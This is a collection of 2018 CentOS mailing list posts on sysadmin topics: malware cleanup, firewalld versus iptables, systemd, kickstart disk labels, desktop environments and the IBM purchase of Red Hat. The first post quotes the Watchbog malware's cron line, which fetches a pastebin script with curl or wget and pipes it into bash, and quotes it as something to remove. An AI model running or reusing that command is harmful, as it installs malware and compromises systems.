On 12/17/18 2:57 PM, Mauricio Tavares wrote: On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan wrote: Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1 3)ps aux | grep watchbog kill -9 pidof watchbog Any suggestions or recommendations to find out how CentOS 7.5 Linux box got infected with Watchbog Malware. Is there any open source software which can do you have untampered log files? be installed on CentOS 7.5 Linux box to detect and prevent Malware? Standard compromise recovery procedure since forever is (your local policy my have slightly different order about notifications and similar): 1. back up all user data 2. Wipe hard drive or whatever storage system you have (some malware potentially can flush itself instead of BIOS, but I haven't seen any of really existing actually do that - experts probably will chime in here) 3. Freshly re-install system, update, configure with all security precautions in mind, restore users and user data 4. Fresh sshd installation takes care of generation of new server key pair, just don't copy and re-use old pair 5. Revoke old SSL certificate(s), and recreate and sign new one(s) - with new secret key 6. Notify superiors and all users about compromise; stress that users have to change their password and key pair(s) on this machine, and should consider compromised their accounts on machines they connected to from this machine after compromise happened. As thorough forensics often takes longer that two weeks, so you can not tell right away exact date of original compromise (not the obvious one you see on the surface now), suggest they change passwords (and key pairs) on machines they ever connected from compromised one. And make them aware that they should apply it as a chain (about account on machines further in the chain of connections). To prevent re-occurrence of the above: update, update, update. Never install anything that is not coming from the source you trust, anything that is not downloaded by yourself from trusted source. Paranoia is in sysadmin's job description. Install host based intrusion detection system. Do your own research and chose what is suitable your situation. I hope this helps. Valeri Thanks in Advance. Best Regards, Kaushal ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Upping my game on web work
On 11/21/18 9:26 AM, mark wrote: Frank Cox wrote: On Wed, 21 Nov 2018 09:02:38 -0500 Robert Moskowitz wrote: What 'simple' web support tools do we have here? Libreoffice can create a html page from a word processor document. I've done that a few times where I do the basic layout with libreoffice and then hand-edit the html to fine tune it. But my web pages aren't usually anything exceptionally fancy. No word processor produces anything but absolute 100% pure crap HTML. Every single line has every possible option, and a few extras. The one HTML editor I ever tried, Quanta, had the lovely habit of, once you hit ?display", when you went back to editing, it has left justified *every* *line*. I hate to suggest it, but something like WordPress might be what you want, if that's not overkill. mark "my web pages proudly built in vi" This is the great advise. Basically, your problem is in asking experts what one can do without willing to gain some expertise. Mark gave nice advise though he himself just edits html (and so do I) when necessary (and my editor is vi as well, even more: real vi on FreeBSD, not vim - that is "vi improved" - that ships with Linuxes). More productive would be searching web for something like "how to create nice webpage without any knowledge" or similar. Note that I didn't use common these days word for searching as I for one am avoiding that particular search service and am using duckduckgo.com (search for answer on the web if it unclear why ;-) Valeri ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] RHEL 8 Public Beta Released
On 11/15/18 12:01 PM, Simon Matter wrote: On 11/15/18 11:50 AM, Simon Matter wrote: https://www.redhat.com/en/blog/powering-its-future-while-preserving-present-introducing-red-hat-enterprise-linux-8-beta Just wondering, is there still something like a mailing list where betas are discussed? IIRC EL6 beta was the last one I saw but maybe I'm missing something? That question is pertinent to RedHat customers' lists, it is note relevant to CentOS. I don't agree. Since there are no corresponding CentOS betas for the new RedHat betas, they have to be considered betas for CentOS as well. I believe is disagree about how CentOS works. I believe CentOS is a binary replica of RedHat Enterprise, and whatever is broken in RedHat Enterprise can only be fixed there. The way you [we] can affect RedHat Enterprise is through their open feedback (not their customer feedback which general publick has no access to), though I have no knowledge is that exists and in what form. But Brilliant people who put together CentOS (thanks a lot, guys!) may chime in to correct me. Valeri Broken things in RHEL8 will also be broken in CentOS8, so if we want a perfect CentOS8 we should contribute to RHEL8 as much as possible. That's how I see it and why I ask about mailing lists for betas. I don't care if they are called RedHat 8 beta or CentOS 8 beta. From the technical POV they are identical, aren't they? Thanks, Simon ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] RHEL 8 Public Beta Released
On 11/15/18 11:50 AM, Simon Matter wrote: https://www.redhat.com/en/blog/powering-its-future-while-preserving-present-introducing-red-hat-enterprise-linux-8-beta Just wondering, is there still something like a mailing list where betas are discussed? IIRC EL6 beta was the last one I saw but maybe I'm missing something? That question is pertinent to RedHat customers' lists, it is note relevant to CentOS. Just my $0.02. Valeri Regards, Simon ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] OT: good free email service ?
Dear All, I know it is an oxymoron: good free ... service ;-) Still, can someone recommend good free email service? I definitely will not go with google, Microsoft, Apple. I don't have same strong feeling about yahoo as I have about above, but... Anyway, thanks in advance for all your advises. Valeri Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] command in kickstart file to write disklabel?
Dear All, At some point after release of CentOS 7 (though this thing might have started before, it is just when _I_ noticed it) I discovered that if I stick into machine drive without disk label, and then do kickstart installation, the command in kickstart file clearpart --initlabel does not work. Even worse: if I just use GUI installer the drive is not listed between available disks. If I switch in the same installer to some virtual console Ctrl + Alt + F2 I can see that the kernel installer run under definitely sees the drive: /dev/sda is present. It must be an issue beaten to death, but somehow my search ability fails on this particular one (I am not "googling" but "duckduckgo-ing", though this shouldn't matter the problem as usually must be myself). Can someone suggest something? I know it is trivial to just create disklabel before sticking drive in machine, but once I'm using kickstart, any need in separate manual steps feels really lame. Thanks a lot for all your help in advance! Valeri ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] fingerprint reader on C-7 ???
On Sat, November 3, 2018 12:48 pm, Fred Smith wrote: > Hi all! > > I just got a new (to me) used laptop (HP EliteBook 8530p) and find that > it has a fingerprint reader. > > Wondering if it could be made to work for me (Centos-7) I did a lot > of googling (well, actually duck-duck-go-ing) You made my day! duckduckgo.com for me always! > and found a ton of hits > on either setting it up in Windoze, or others wondering if it can be > used in Linux. Some info on setting it up in Ubuntu, and a couple of > pages on setting it up in Fedora, pages that were ten years old, or so. > > Found an academic paper on a group that wrote portable tools in Java > that allegedly enable it in a cross-platfor manner, but not the > software itself. > > Does anyone here have any better information on if it is possible, > and if so, how? I have fingerprint reader on my laptop, and I never configure that with my fingerprints. If someone is evil enough, they can beat my password out of me and walk away with my laptop and password. I don't want them walk away with my finger to use on fingerprint reader ;-) There are other considerations similar to using dickdickgo but not google. Stolen password you can change. What about stolen fingerprint metrics? Thanks again for duckduckgo! Valeri > > thanks in advance! > > Fred > > -- > Fred Smith -- fre...@fcshome.stoneham.ma.us > - > The eyes of the Lord are everywhere, > keeping watch on the wicked and the good. > - Proverbs 15:3 (niv) > - > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Red Hat is Planning To Deprecate KDE on RHEL By 2024
On 11/2/18 3:35 PM, Robert Heller wrote: At Fri, 2 Nov 2018 14:02:56 -0600 CentOS mailing list wrote: https://www.theregister.co.uk/2018/11/02/rhel_deprecates_kde/ That's still several years in the future, of course. I use Mate on all of my machines rather than Gnome or KDE and I'm sure many of you fine folks do the same. But it's interesting nonetheless. I one of the few (?) people who use "none of the above" (meaning all of the "modern" desktop managers). I use fvwm in MWM mode and have a Tcl/Tk coded "menu manager" program. My screen looks almost like a 1980s vintage VaxStation 3000 running DECWindows. Right now on C6 and using as little of Gnome2 as it will let me (one panel). File Manage set to /bin/true. No "start" menu nonsense, no desktop icons either, just a fvwm iconbox for running programs and a 10 element Workspace switcher. And yes, I use actual xterms. Indeed, my alternatives to Mate would/may be one the these. Interestingly, some people when they see my screen (I'm sysadmin supporting a couple of Departments, about 300 people) ask "what Linux distribution do you have". I have to explain that that is Mate desktop environment... and it is actually FreeBSD, not Linux I run on my workstation. I don't know, it sounds like even people who are quite familiar with Linux to even ask that question, are not that familiar that that is the Desktop Environment for X11 that mostly defines "look and feel". World is different from what it was a decade ago ;-) Valeri -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Red Hat is Planning To Deprecate KDE on RHEL By 2024
On 11/2/18 3:02 PM, Frank Cox wrote: https://www.theregister.co.uk/2018/11/02/rhel_deprecates_kde/ That's still several years in the future, of course. I use Mate on all of my machines rather than Gnome or KDE and I'm sure many of you fine folks do the same. It probably is just us, older folk who use Mate everywhere. There are two ways to put it: I still have enough brain to be able to categorize, and find what I need in menu tree or I didn't blend into iPad generation to access things through search only (and I do not intend to ask google how much money I have left in my wallet ;-) Thanks to nice guys who forked Mate off Gnome and are maintaining it!! Valeri But it's interesting nonetheless. -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] IBM buying RedHat
On 10/30/18 12:47 PM, Mark Rousell wrote: On 30/10/2018 16:40, mark wrote: Linux was IBM's silver bullet on a free platter. I mean, *how* many operatings systems do you want to support...? Yup, it must cost them a pretty penny to maintain all those proprietary operating systems (especially when you include their mainframe ones). I suspect that Linux I would add "and FreeBSD" here. Mentioning only one of BSD descendants, the one with largest userbase. Valeri will eventually replace i and AIX -- eventually. But I bet there are some significant clients who are still willing to pay money to keep them going. -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] IBM buying RedHat
On Sun, October 28, 2018 6:07 pm, mark wrote: > On 10/28/18 17:54, Zube wrote: >> On Sun Oct 28 10:20:31 PM, Alain péan wrote: >> >>> Le 28/10/2018 à 22:10, Albert McCann a écrit : >>>> Damn, this is bad enough to make one weep. >>> >>> Red Hat would stay as a distinct entity inside IBM. IBM has also >>> contributed to Free software, and especially Linux kernel. >>> I don't know how bad it is and the implications for CentOS... >> >> That old war wound started aching again. >> >> IBM:Redhat :: Oracle:Sun > > Actually, it could have been *much8 worse: *Oracle* could have bought RH. > > That *really* would have been an order of magnitude worse. > I like the fact that it was IBM who bought RedHat. I remember several good things about IBM: 1. Postfix. Vietse Venema wrote it at IBM Thomas J. Watson Research Center, and IBM was really happy to release MTA written with security in mind under IBM Public License 1.0 which is a free software license - for everybody to use. 2. Does anybody still remember OS/2 which lost userbase to MS Windows for workgroups, but IBM still supported it for quite long period of time. And OS/2 was much better IMHO. I bet many people can add other great things about IBM. All in all I'm not unhappy IBM bough RedHat, but will be quite unhappy if IBM sells RedHat to somebody else after some time. Valeri Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Stupid C7 firewall question
On 10/25/18 2:41 AM, Warren Young wrote: On Oct 24, 2018, at 8:06 PM, Joel Freeman wrote: Is there any reason to use Firewalld over IPTables? Lots: https://firewalld.org/ I'm incredibly new to Linux administration Given that, which would you rather type: $ sudo firewall-cmd --add-service=ftp or whatever that does under the hood, which probably resembles the 7 commands given here: https://unix.stackexchange.com/a/93555/138 The commands given will only take effect while the system runs, so to make them permanent, you have to edit `/etc/sysconfig/iptables` with a somewhat different syntax. Contrast FirewallD, where you just re-issue the command above with a single additional flag: $ sudo firewall-cmd --add-service=ftp --permanent FTP is an uncommonly difficult case, but direct iptables manipulation remains more difficult even in the single-port case. FirewallD doesn’t require that you use predefined services, either. It works just fine with raw port numbers: $ sudo firewall-cmd --add-port=5/tcp Contrast the equivalent iptables command: $ sudo iptables -A INPUT -p tcp --dport 5 -j ACCEPT …and that only works if inserting into the INPUT chain is what you actually want to do, which it might not be on a system managed by FirewallD, which probably set up some more complicated chain scheme you’d have to understand in order to get the expected behavior. Why not let FirewallD handle all of that for you? I don’t miss direct iptables manipulation. Thanks Warren for nice quick start covering everything one needs to configure firewalld. There is one thing I am related to "direct iptables manipulation" which is: suppose I made configuration of some machine, which then I am going to replicate just by using kickstart when building new machines. What should I add to kickstart configuration file to make my configured firewalld part reproduced on all newly built machines? Thanks again! Valeri PS Your quick startup reminds me how we were introducing UNIX (shell) to new users: basically we were showing them a handful of commands (5-10) with which person can start, and knowing which person can start doing what one needs. Bottom line: it takes 5-10 minutes to start using UNIX, no need to read 1000 page book before starting. I have exactly the same feeling after your introduction into firewalld - (except kickstart missing for me). ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Upstream and downstream (was Re: What are the differences between systemd and non-systemd Linux distros?)
On Sat, October 20, 2018 11:09 am, Yan Li wrote: > On 10/20/18 8:37 AM, Valeri Galtsev wrote: >> Oh, great, I now can see the world with your eyes! And last part about >> servers life cycle wise doesn't sound much different from what I do >> using >> FreeBSD and jails. The only difference is maybe in how frequently I have >> to reboot Linux (any flavor) due to kernel or glibc security update >> compared to reboot of FreeBSD. > > Yup. That's indeed a problem that the Fedora kernel is moving a bit too > fast for a server. Our machines sit behind a firewall, and as of I know, > our students are not crazy about privilege escalation/Meltdown attacking > their own servers. So we usually only reboot when there's a power outage > that is longer than what our UPS could handle, which is unfortunately > quite common on this campus. I can not afford that. I do run all machines (not only multi-user servers, but single user grad. student's workstations) in an assumption that bad guys are already inside. I have never seen privilege escalation attempts on single user machines, but I've seen a couple of times such attempts on multi-user machines. Unsuccessful for several reasons, still, that was fun to observer almost in real time ;-) So, I keep running all machines in an assumption that bad guys are already inside. Valeri > > -- > Yan Li > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Upstream and downstream (was Re: What are the differences between systemd and non-systemd Linux distros?)
On Sat, October 20, 2018 10:22 am, Yan Li wrote: > On 10/20/18 7:42 AM, Valeri Galtsev wrote: >> I would like to hear the reasons of those who chose to use Fedora on >> their >> server. Specifically what advantages one has found compared to other >> alternatives. And also what kind of server that is. Single >> user/home/family one? Serving some department or similar (say 100 >> people, >> who may need services 24/7/365)? I know, this is just my curiosity, as I >> did make my own choice, but curiosity grossly fueled by the fact that my >> choice is grossly different. >> >> Always happy to hear different [from mine] opinions which may be based >> on >> different objectives. > > We are running about 50 development servers for the Storage Systems > Research Center in the University of California, Santa Cruz. All Fedora. > We will be updating all machines to F29 as soon as it is released. The > reason is that we want the students to have access to the latest > development toolchain, libraries, and other tools from the Linux world > in a reasonably stable fashion. Fedora is the best fit. Not bleeding > edge, but not outdated either. Our infrastructure servers, such as file > sharing, cluster management, etc., are all Fedora machines too, for > homogeneity and simplicity. > > We don't need 24/7/365 uptime, but in my memory, there has been no > downtime caused by anything in Fedora in the past decade. And we always > do in-place upgrading when a new Fedora comes out. Upgrading from one > Fedora to the next never failed us in the past decade either in my memory. > > Occasionally, one or more machines will be loaded with CentOS 7 for a > few months for running Lustre or some other CentOS/RHEL certified > software. > > This is unrelated to the campus-wise Linux clusters that are managed by > the university IT department, which maintains hundreds of CentOS > machines for the whole campus. > > I also know colleagues who maintain Fedora as servers from my other > jobs. These were for all kinds of services: email, file storage, > development, etc. Why Fedora over CentOS? I guess Fedora is more fun to > play with and is stable enough for these applications. As I said before, > in-place upgrading for Fedora is pretty reliable. And doing it once a > year (or every 6 months) to get the latest software is a good bargain > for a techie. Oh, great, I now can see the world with your eyes! And last part about servers life cycle wise doesn't sound much different from what I do using FreeBSD and jails. The only difference is maybe in how frequently I have to reboot Linux (any flavor) due to kernel or glibc security update compared to reboot of FreeBSD. Thanks a lot! Valeri > > -- > Yan Li > _______ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Upstream and downstream (was Re: What are the differences between systemd and non-systemd Linux distros?)
On Sat, October 20, 2018 8:23 am, Matthew Miller wrote: > On Thu, Oct 18, 2018 at 05:52:12PM -0700, Japheth Cleaver wrote: >> The wider EL community is trapped between a rock and a hard place >> somewhat. If you try to direct Fedora into the needs of EL users, >> you stand a good chance of getting told to pound stand, and that EL >> is getting in the way of bleeding-edge progress. Traditionally, > > For what it's worth (I hope something!) I think this is an outdated fear > or > assumption. Before Fedora.next, the "default user" for Fedora was assumed > to > be an indiviual desktop user, and the overall Fedora OS offering meant to > be > one-size-fits-all but modeled to that user. That wasn't working, partly > for the reason you identify here. Nonetheless, something like 20% of > Fedora > usage is on servers, and a lot of people work with Fedora in parallel with > a Enterprise Linux deployment. We needed to find a place for those users > to > have a voice. I would like to hear the reasons of those who chose to use Fedora on their server. Specifically what advantages one has found compared to other alternatives. And also what kind of server that is. Single user/home/family one? Serving some department or similar (say 100 people, who may need services 24/7/365)? I know, this is just my curiosity, as I did make my own choice, but curiosity grossly fueled by the fact that my choice is grossly different. Always happy to hear different [from mine] opinions which may be based on different objectives. Valeri > > So, Fedora Server was explicitly chartered as not just for its own sake > (although we intend to make that true as well) but also the intentional > upstream for downstream enterprise Linux consumers. That doesn't mean that > every change there goes into RHEL, or is RH blessed or even Red Hat > aligned > â but the needs of EL users are *definitely* taken into account. > > >> wider EL-using community. Does it want direct feedback in the form >> of tickets? Should people form SIGs? Obviously RHEL7 is not changing >> init systems, but where should one talk about the future? > > If this is your interest, I'd really encourage you to get more involved > in Fedora Server. We could use your input. > > > -- > Matthew Miller > > Fedora Project Leader > _______ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] What are the differences between systemd and non-systemd Linux distros?
tOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] What are the differences between systemd and non-systemd Linux distros?
On 10/16/18 7:51 AM, Leroy Tennison wrote: Systemd is implemented in all the major distros, if you want to find ones that don't search for non-systemd. Hoping to not offend proponents of systemd/firewalld... Linux kernel is already containing chunks of code related to systemd/firewalld and friends. One can disable stuff during kernel build, but the result it still is not like the result of building kernel before the existence of systemd/firewalld. Also, it is likely that at some point systemd-free Linux distribution(s) may fade away. That said, if one is strongly willing to stay away from systemd, and not to such extent into Linux as to needing an advise on that, I would recommend to take a look at non-Linux system, specifically BSD descendants (FreeBSD, NetBSD, etc). Their kernel is not as heavy (big,resource demanding) as Linux kernel, and you can do pretty much everything one needs (except maybe computer games, although these will fall mostly into MS Windows scope). I for one have FreeBSD on my laptop (with alternative boot into Debian, the last being systemd though...). I hope, this helps. Valeri Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Robert Moskowitz Sent: Tuesday, October 16, 2018 5:14 AM To: CentOS mailing list; Turritopsis Dohrnii Teo En Ming Subject: [EXTERNAL] Re: [CentOS] What are the differences between systemd and non-systemd Linux distros? On 10/16/18 1:54 AM, Turritopsis Dohrnii Teo En Ming wrote: Good afternoon from Singapore, What are the differences between systemd and non-systemd Linux distros? Is systemd implemented in all the latest Linux distros? Please advise. Thank you. My advice is to go and read up on the original design goals of systemd. The information is out there. We had this discussion here years ago when we were staring and the impending transition. Read the archives on the angst the change engendered and the adjustment to the new methodology. They say that the Internet never forgets, so you should be able to find the original discussions and make your own judgment call. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] C 7 installation annoyances
On 10/15/18 3:22 PM, mark wrote: In the disk partitioner, I can't 1) choose to make the LVM with root and swap be on a RAID 1. Is there some way to do that, rather than two separate partitions RAIDed? 2) They don't align, so I can't clone /dev/sda to /dev/sdb as a failover (for /boot and /boot/efi). I've created those two, manually, and nope, it wiped them out, so I can't clone those two. Any solutions for either of these? I don't have hardware RAID card on this box. My favorite solution to above is: all my filesystems live on hardware RAID devices. No intermediate things like LVMs or software RAID. Just GPT label and "simple" partitions (or whatever synonym installer script is using). I know, you pay a bit more for hardware. But in addition to having more reliable IMHO system (I know, some people do not agree), you have simplicity, which also adds to reliability, and to speedy recovery from failures with much smaller room for blunders and data loss. Just my $0.02. Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Scroll bar arrows missing and behaviour change
On 10/12/18 8:40 AM, Leroy Tennison wrote: And I thought it was a Kubuntu (Ubuntu with KDE desktop for those who aren't familiar) thing! Apparently it's a KDE thing. I haven't experienced the scrollbar aspect (or maybe I just haven't done what you do) but my arrows are missing too. I'm thinking this is a KDE Blasted Ugly Gotcha (BUG). BTW, if you haven't already discovered it, if you position your cursor where the arrows used to be the "arrow functionality" still exists (if you can get the cursor position just right). KDE now has invisible features... In the past as programmers we were taught more wisdom than today's "coders" have been: One of the rules of thumb was: Don't make any changes in [debugged] program unless they are absolutely necessary. On a similar note: who remembers netscape navigator (web browser)? It was pleasantly not changing its appearance and UI (User Interface) for ages. These days Firefox and thunderbird are being rushed with new releases. "Releases" full of security holes (take a look at CentOS update history: firefox security updates are the most often ones). As if they are aiming to beat everybody in version number (currently major version in 50th-60th). But they can not beat Microsoft who has a release: Windows 2000. [no beginning of rant tag, as I'm not certain where to put it] Valeri Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Gary Stainburn Sent: Friday, October 12, 2018 3:48 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] Scroll bar arrows missing and behaviour change I have done some Googling on this but everything I've found appears to be at least 2 years old and mostly refers to Gnome TBH, I'm surprised nobody else has mentioned it - maybe it's only happened to me. At some point over the last few months the behaviour of the scroll bars changed and I'm finding it very annoying. Firstly, the arrows have vanished. Secondly, when clicking on the scroll bar background either above or below the drag bar instead of doing a page up or page down which is what it used to do (and what I want it to continue doing) it now moves the scroll bar to that absolute position, i.e. if I click on 75% down the scroll bar it jumps to 75% of the document. As this is happening in all apps I'm assuming it's something within KDE that had changed. I'm running an up-to-date Centos 7 x64 running the KDE desktop. Anyone got suggestions on how I can get back the the old style (windows clone) behaviour and appearance? ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Seagate - experience/opinion on vendor?
On 9/26/18 2:51 PM, Mauricio Tavares wrote: On Wed, Sep 26, 2018 at 3:37 PM, lejeczek via CentOS wrote: On 26/09/18 20:19, Mauricio Tavares wrote: If ti makes you feel any better, I am not having stellar service from WD's support. In fact, they act like they never received the HD I sent for RMA whose tracking number says they did 10 days ago. On Wed, Sep 26, 2018 at 2:16 PM, lejeczek via CentOS wrote: hi guys I have rather a large set of Seagate's SAS ST32000444SS, over a hundred - experience I'm having from those in conjunction with their tech support is abysmal. I'm trying to update firmware of these drives and nothing works, including tech support. ... and I cannot help but wonder - is just me who is so unlucky and getting very, very poor support(taking naturally only of Linux) or in fact Seagate are rubbish! Care to share your say? thanks, L. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos what seems really really bad, is that none of the tools their tech support suggest works, at least for me. You would think that simple thing such as firmware update should be really a piece of cake, but it seems that Seagate too, is rubbish when it come to Linux. One would think Seagate should not that mistake but, yet again, yet another business which does not like Linux customers. I do not think it is malice but just plain ignorance or the famous "if it works, don't fix it" principle. Remember that even today you can buy cars with without rear disk brakes. With that said, I thought Seagate had a .iso to deploy the firmware. I could be wrong though. What I am saying is not intended to advocate for Seagate, they are not even my first choice as hard drive manufacturer. I for one am very conservative about updating/upgrading firmware of trivial devices such as hard drive or system board ("motherboard"). What specifically are you planning to achieve by doing that? Note that firmware is extremely small hence very simple program which can be easily debugged and for mass manufactured devices can be virtually clean of bugs including ones with security implications. That said, if firmware upgrade is necessary to fix real potential trouble, I'd rather stop using that manufacturer in a future (no matter whether their support is outstanding of doesn't exist). Other reasons may be: performance improvement (but it's doubtful to achiever significant improvement that way), or changing specs, like converting 500 byre to 4 kilobyte sector, which as far as I know is impossible. Just a side note about quality of support: I said once the following about one hardware manufacturer whose hardware I recommended when was asked how good their support is: I use their devices for over decade and a half, never had to contact their support. Their devices keep working, during warranty and after that ends, some of them as old as 15 years old... Valeri ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Certificates
On 9/1/18 1:12 PM, Rainer Duffner wrote: Am 01.09.2018 um 18:00 schrieb Leon Fauster via CentOS : Out of curiosity - do you change also the private key every time? I’m pretty sure LE creates a new private key, too. I just checked on my box and confirm that yes, with every renewal of certificate new key is created. I should realize that fact even before looking, as it is asymmetric encryption pair, thus the new pair cert+key is generated (and the cert [request] gets signed). Valeri From a cursory glance at lego’s certificate directory on a server with a couple of dozens of LE certificates at least. After all, changing the private key is what this is all about (showing that you’re still in charge). ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
